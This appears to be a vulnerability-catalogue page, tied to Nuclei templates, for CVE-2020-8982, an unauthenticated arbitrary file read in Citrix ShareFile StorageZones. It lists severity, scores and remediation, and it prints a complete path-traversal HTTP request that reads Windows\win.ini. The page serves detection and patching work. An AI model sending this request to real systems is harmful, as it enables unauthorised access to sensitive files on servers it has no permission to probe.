🔙 목록으로 돌아가기

CVE-2020-8982: Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read

TitleCitrix ShareFile StorageZones <=5.10.x - Arbitrary File Read
Authordwisiswant0
SeverityHigh
ImpactAn attacker can read arbitrary files on the affected system, potentially leading to unauthorized access to sensitive information.
RemediationUpgrade Citrix ShareFile StorageZones to version 5.11 or higher to mitigate the vulnerability.
CVSS Score7.5
EPSS Score0.7588
CVE IDCVE-2020-8982
CWE IDCWE-22
Tags cve2020 cve citrix lfi vkev vuln

🔍 Vulnerability Description

Citrix ShareFile StorageZones (aka storage zones) Controller versions through at least 5.10.x are susceptible to an unauthenticated arbitrary file read vulnerability.

🌐 HTTP Request

GET /XmlPeek.aspx?dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-8982.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-8982.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A